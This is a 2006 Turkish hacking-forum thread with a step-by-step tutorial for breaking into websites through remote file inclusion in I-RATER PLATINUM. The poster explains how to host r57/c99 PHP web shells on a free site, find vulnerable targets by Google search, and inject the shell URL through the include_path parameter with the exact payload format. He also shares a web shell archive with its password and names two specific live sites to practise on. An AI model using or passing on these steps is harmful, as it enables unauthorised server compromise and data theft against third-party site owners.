İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Shell Hakkında Bilgi | File İclude Nedir ? Nasıl Uygulanır |

23-09-2006 12:00
#1
NightWolf - ait Kullanıcı Resmi (Avatar)
uid=0(root) gid=0(root)
Üyelik tarihi:
12/2005
Nereden:
about:home
Mesajlar:
729
Teşekkür (Etti):
55
Teşekkür (Aldı):
569
Konular:
135
Ticaret:
(0) %
File Include Nedir?_ Amacı Nedir?

File ın Türkçe karşılıgı ''Dosya'' Include un Türkçe karşılığı ise ''içine almak* içermek'' tır.Sımdı bu ıkı sozcugu bırlestırgıınızde File Include dosya içine almak eklemek manasına gelmektedır.Pekı terımı anladıysak ne işe yaramaktadır ;

File include bızım ısmınden anladıgımız üzere sistemlere dosya ekleme yada dosya cağırma manasına gelmektedır.Ama burada en onemli olan cagıracagımız dosyanın turu özellikle illegaliate merak saran kışıler için bu dosya turleri cok onemlidir.Ornegın saldırgan birey cagıracagı bir shell dosyasıyla servera erisebilir ve serverin içindeki tüm bilgileri alıp serverdaki sistemleri hackleyebilir.Bu tıp bir saldırı server sahibi için zarar demetir bunun yanında saldırıya yapan kişi içinse muthiş bir nam ve deneyım olacaktır.

File Include server sahıblerı için tam manasıyla bas belası hackerlar için sedünyadakı en kaliteli yöntemlerden biridir...Kısaca sadece site hacklemekle ilgilenenler içinse hackın vazgecılmesı durumundadır....

File Include Nasıl Uygulanır ?

File Include uygulnaamsını anlatmak için once bir takım terımleri tanımanız gerekmektedir ;

R57shell: Su andadunyadaki en kaliteli shelldir.Shell nedir shell kısaca linux kabugudur.İllegaliate merak saranlar içinse internetin ta kendısıdır.

C99shell: R57Shell in birazcık daha eskı ve daha kullanıssız versiyonudur.

TurkHackTeaM.OrG

File include uygulamasının uygulanmasına gecelim...

Şimdi sizlere file includelardan nasıl yararlanacagınız ve file include terımınden bahsedecem....
Simdi arkadaslar guncel vulnerabilities larin(Acıklarin) en cok yayınlandıgı sistemleri size vereyım ilk olarak ..
www.milw0rm.com ( web apps)
www.turkhackteam.org
http://securityreason.com/exploit_alert/
...

Genel olarak en genıs arşivmilw0rmda bulunmaktadır.Şimdi uygulamalı olarak bir siteye saldıralım ki olayı iyice anlayın.İlk olarak vulnerabilities imizi bulalım...

milw0rm.com webapps I-RATER PLATINUM Remote File Inclusion Vulnerabilities

Sistemimiz bu oLsun ve sız bu dosyaya tıkladıgınızda I-RATER PLATINUM sistemde olan file include vulnerabilty ne ulasabileceksiniz.Ve acılan sayfaya baktıgınızda

http://www.xxx.com/admin/config_settings.tpl.php?include_path=[Shell]
seklinde bir seyle karsılacaksınız.Peki bu ne anlama gelmektedir onuda açıklayım...

xxx.com Bizim saldıracagımız site (Yani Kurban Site Veya Server)

Eger site sahıbı kullandıgı scriptin dosyalarını atarken bir dosya içinde attıysa o
http://www.xxx.com/patch/admin/config_settings.tpl.php?include_path=[Shell] şeklinde olacaktır

WwW.TurkHackTeaM.OrG


config_settings.tpl.php?include_path=[Shell]-Buda file includemuzu oldugu bölümdür ki bu devamli değısıklık gosterir ben genel olarak yazıyorum bu su şekildede olabilir o siteye göre değişir.

Bunu nasıl yapacagız ılk milw0rm dan buldugumuz dosyanın adı I-RATER PLATINUM Remote File Inclusion Vulnerabilities peki bu ne anlama geliyo I-RATER PLATINUM olan sistemlerde dosya sokma acıgının bulundugu manasına gelir bizde google.com'da I-RATER PLATINUM seklinde aratırsak yada sistemden yapılmıs herhangı bır sıteye ulasıp altındakı copyrigt yazısını google yazarsanız daha cok site bulabilirsiniz...

Simdi gelelim file includeumuzu uygulamaya etkilenen sistemi ve nasıl buldugumuzu öğrendığımıze gore gerıye sadece pratık kalıyor.

shelli herhangi biryere upload ediyoruz linkimiz www.turkhackteam.org/yourshell.txt olsun ve işime devam ediyorum simdi google aramasına geri donelim... aradıgımız sitelerde simdi seriden tek tek deneme yapıyoruz taki file include u yedirecegimiz bir site bulana kadar ....

Yedirme seklimiz su sekilde olacak...

http://www.xxx.com/admin/config_settings.tpl.php?include_path=http://www.turkhackteam.org/yourshell.txt?

Dikkat edilmesi gereken iki husus var shell linkinizi yazarken = sonrası içinn http:// başa mutlaka konulmalı ve sona da ''?'' bu konulmalı mutlaka aksi taktırde yaptıgımız uygulmanın manası olmucaktır cunku calısmayacaktır...

Eğer yerse kullandıgınız shell e gore asagıda ki gibi bir resım cıkacaktır.Dosyalar sıralanmıs yanında permlerin oldugu.
Perm = İzin

C99 ==>http://img151.imageshack.us/my.php?image=shellss1.jpg

R57 ==> http://img178.imageshack.us/my.php?image=r57mb8.jpg

Yeşil Renkli olanlarda değişiklik yapabilirsiniz

Ve shelli siteye soktuk artık bır nevı server sızın gerisi size kalmış...

Shell Link (C99)

İNDİR

rar şifresi : turkhackteam.org

\\ By NightWolf //


-------------------------------

c99.shell.php
hbtcasus.php
phpRemotevieW.php
PHPShellbyMacker.php
r57shell-1.3.php
r57shell-v1.24.php
c99shellbeta.php
kobra.php
phpshell.php
PHVayv.php
r57shell-v1.0.php
r57.php
cmd.asp
CyperSpy5.asp
klasvayv.asp
CyberEye.asp
EFSo2.asp
Zehir4.asp

DOWNLOAD


Verdiğim Sitelerdeki Açıklar Kapanmış Olabilir Bu Yüzden Başka Sitelerde Deneyin Veya Güncel Başka Açıklar Arayın

NOT : BAZI ARKADAŞLAR HALA ANLAMAMAKTA DİRENİYOR SHELL BİRNEVİ BACKDOORDUR BU YÜZDEN VİRÜS PROGRMLARI VİRÜS OLARAK GÖRÜR


------------------------------------------------------------------------


Çoğu arkadaşımız shelli nasıl upload edeceklerini ve nasıl kullanacaklarını soruyor... Bu konuda kısa bir açıklama yapayım

1) Öncelikler kendinize birtane ücretsiz site alıyoruz ( Forumda Hosting Bölümüne bakarsanız bulursunuz )


2) İndirdiğiniz bu shelleri almış olduğunuz ücretsiz siteye yüklüyorsunuz.


Bu 2 aşamayı yaptıktan sonra ...


3)
Remote File Inclusion Vulnerabilities açığını arıyacağız... Bu açığı yayınlayan siteler var
Güncel Açıklar - Hack I TurkHackTeam Turkish Hacking&Security Platform

ExploitAlert Database - Exploits - Index - SecurityReason.com

veya başka sitelerdende bakabilirsiniz, açık aramak için tekbir siteye bağlı kalmayın ne kadar çok site o kadar çok açık bulursunuz ...

4) Şimdi herşey hazır free sitemizi aldık , shelleri upload ettik , güncel açıkarı bulduk. geldik bu açıkların hangi sitelerde olduğunu bulmaya bunun için Google yi kullanacağız...

Konuda kullandığın eski bir açıktır o yüzden bu açığı olan site pek kalmamıştır ama ben aynı açık üzerinden anlatacağım...

*
Alıntı:
I-RATER PLATINUM Remote File Inclusion Vulnerabilities

Sistemimiz bu oLsun ve sız bu dosyaya tıkladıgınızda I-RATER PLATINUM sistemde olan file include vulnerabilty ne ulasabileceksiniz.Ve acılan sayfaya baktıgınızda

http://www.xxx.com/admin/config_sett...?include_path=
[Shell]
seklinde bir seyle karsılacaksınız.Peki bu ne anlama gelmektedir onuda açıklayım...


http://www.xxx.com/patch/admin/confi...?include_path=
[Shell] şeklinde olacaktır
5) Googlede aramımız yaptık ve bir site seçtik açığı bu site üzerinden deniyeceğiz

*
http://www.kurbansite.com/patch/admin/config_settings.tpl.php?include_path=

= işaretinden sonra Shelli upload ettiğimiz sitenin adresini ekliyeceğiz

Yani

Alıntı:
Dikkat edilmesi gereken iki husus var shell linkinizi yazarken = sonrası içinn http:// başa mutlaka konulmalı ve sona da ''?'' bu konulmalı mutlaka aksi taktırde yaptıgımız uygulmanın manası olmucaktır cunku calısmayacaktır...

6) Eğer sitede açık varsa karşımızda şöyle bi ekran gelecek

Alıntı:
Yeşil Renkli olanlarda değişiklik yapabilirsiniz


Umarım Yardımcı olabilmişimdir ...

Kullanıcı İmzası
Kendinden Büyük İnsan İstemeyen Lider,Yükselen Her Başı kesecektir...
Konu Komega tarafından (10-03-2015 16:07 Saat 16:07 ) değiştirilmiştir.

23-09-2006 13:11
#2
NightWolf - ait Kullanıcı Resmi (Avatar)
uid=0(root) gid=0(root)
Üyelik tarihi:
12/2005
Nereden:
about:home
Mesajlar:
729
Teşekkür (Etti):
55
Teşekkür (Aldı):
569
Konular:
135
Ticaret:
(0) %
Örnek olarakta size 2 tane site vereyim üzerinde çalışın

http://www.thehxc.com/punkornot/admin/config_settings.tpl.php?include_path=shell adresinizi yazın

------------

http://www.voting.ws/admin/config_settings.tpl.php?include_path=shell adresinizi yazın
Kullanıcı İmzası
Kendinden Büyük İnsan İstemeyen Lider,Yükselen Her Başı kesecektir...
23-09-2006 16:42
#3
3333 - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
12/2005
Nereden:
Little Town.
Mesajlar:
3.213
Teşekkür (Etti):
128
Teşekkür (Aldı):
1222
Konular:
1294
Ticaret:
(0) %
out zone Turkhackteam.. içerisine www.turkhackteam.org adreslerini serpiştirdim we repledim
Kullanıcı İmzası
Biz arkamızı vatanımızdan ve atamızdan başka hiçbir şeye dayamayan, gücümüzü ve bütünlüğümüzü sadece milli değerlerimizden alan bir topluluğuz. Gururumuz ve Onurumuz Bizi biz yapan değerlerdir. Siz Turkhackteam üyeleri, hiç kimsenin kulu köpeği olmayan bu topluluğun bir parçası olduğunuz için çok değerlisiniz. Hepinize sonsuz teşekkürler




Bir Turk Hack Team Yöneticisi(!) MSN üzerinden sizi ekleyip size dosya göndermeye çalışırsa ve ya sizden kullanıcı adınızı ve şifrenizi isterse kesinlikle o kişilere inanmayınız. Bizler sizinle görüşme yapamayı istersek sizlere site üzerinden ulaşıp iletişim adresimizi veririz. Kötü Niyetli Kişilere Aldanmayın!!

Sitemiz üzerinden Kendi sitelerinin reklamını yapanlara mahal vermeyiniz. Sizlere Özel mesajla veya diğer platformlardan kendi sitelerine çekmeye çalışanları bizlere bildiriniz. Unutmayın Taklitler asıllarını yüceltir.



"Unutmayın !Yaktığınız can kadar canınız yanacak ve üzdüğünüz kadar üzüleceksiniz.."(Hadis-i Şerif)


A.D.D
Konu 3333 tarafından (23-09-2006 16:47 Saat 16:47 ) değiştirilmiştir.
23-09-2006 21:16
#4
Arsenik-tht - ait Kullanıcı Resmi (Avatar)
Root Administrator
Üyelik tarihi:
12/2005
Mesajlar:
824
Teşekkür (Etti):
3
Teşekkür (Aldı):
2808
Konular:
157
Ticaret:
(0) %
shell hakkinda fazlasiyla bilgi veriyor dokuman tebrikler.
By_qizemLisT, shergar5555 Teşekkür etti.
24-09-2006 14:29
#5
asi_kız - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2006
Mesajlar:
1.508
Teşekkür (Etti):
0
Teşekkür (Aldı):
113
Konular:
857
Ticaret:
(0) %
ben sınıfta kaldım
Bingoneral Teşekkür etti.
24-09-2006 14:36
#6
asi_kız - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2006
Mesajlar:
1.508
Teşekkür (Etti):
0
Teşekkür (Aldı):
113
Konular:
857
Ticaret:
(0) %
ama yapamıyommm yaaa
24-09-2006 21:46
#7
SuKiYaNeN - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2006
Mesajlar:
1
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Konular:
0
Ticaret:
(0) %
ben bi şey sormak istiorum kendimiz shell alabiliormuyuz_? Alabiliorsak nerden alabiliriz yardımcı olursanız sevinirim şimdiden teşekkür ederim ii çalışmalar
24-09-2006 21:55
#8
NightWolf - ait Kullanıcı Resmi (Avatar)
uid=0(root) gid=0(root)
Üyelik tarihi:
12/2005
Nereden:
about:home
Mesajlar:
729
Teşekkür (Etti):
55
Teşekkür (Aldı):
569
Konular:
135
Ticaret:
(0) %
dökümanın altına zaten shell linklerini verdim indirerek shelleri kullanabilirsiniz.
Kullanıcı İmzası
Kendinden Büyük İnsan İstemeyen Lider,Yükselen Her Başı kesecektir...
28-09-2006 00:21
#9
İsimsiZ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2006
Mesajlar:
2
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Konular:
1
Ticaret:
(0) %
Kardeş Ben birşey anlamadım adresini ekledim inş ögreniriz
28-09-2006 17:21
#10
anilbak27 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2006
Mesajlar:
20
Teşekkür (Etti):
0
Teşekkür (Aldı):
3
Konular:
6
Ticaret:
(0) %
dosyada virüs varr

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı